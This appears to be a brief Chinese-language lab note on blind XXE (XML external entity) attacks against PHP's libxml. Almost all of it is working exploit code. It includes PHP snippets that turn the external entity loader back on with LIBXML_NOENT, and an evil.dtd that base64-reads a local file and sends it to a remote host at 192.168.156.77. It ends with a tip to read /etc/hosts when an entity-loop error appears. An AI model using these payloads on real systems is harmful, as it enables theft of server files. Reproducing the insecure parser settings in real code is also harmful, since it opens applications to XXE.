在libxml>=2.9.0以後的版本默認不開啟外部實體解析，需要添加參數開啟

<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt">
<!ENTITY % remote SYSTEM "http://192.168.156.77/xxe/evil.dtd">
%remote;
%all;
]>
<c>&send;</c>
EOF;

libxml_disable_entity_loader(
 
false);
$data = simplexml_load_string($xml, ‘SimpleXMLElement‘, LIBXML_NOENT);#print_r($data);

<!ENTITY % all
"<!ENTITY send SYSTEM ‘http://192.168.156.77/?%file;‘>"
>

<?php
$xml = <<<EOF
<?xml version="1.0"?>
<!DOCTYPE ANY [
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/tmp/aaa.txt">
<!ENTITY % remote SYSTEM
 
 "http://192.168.156.77/xxe/evil.dtd">
%remote;
%send;
]>
<c></c>
EOF;

libxml_disable_entity_loader(false);
$data = simplexml_load_string($xml, ‘SimpleXMLElement‘, LIBXML_NOENT);
#print_r($data);

<!ENTITY % all
"<!ENTITY &#37; send SYSTEM ‘http://192.168.156.77/?%file;‘>"
>
 

如果有類似如下報錯，嘗試換/etc/hosts讀取，可能是防止指數放大攻擊，對內容長度做了限制。

Detected an entity reference loop in http://192.168.125.133:8081/evil.dtd

blind-XXE的幾個細節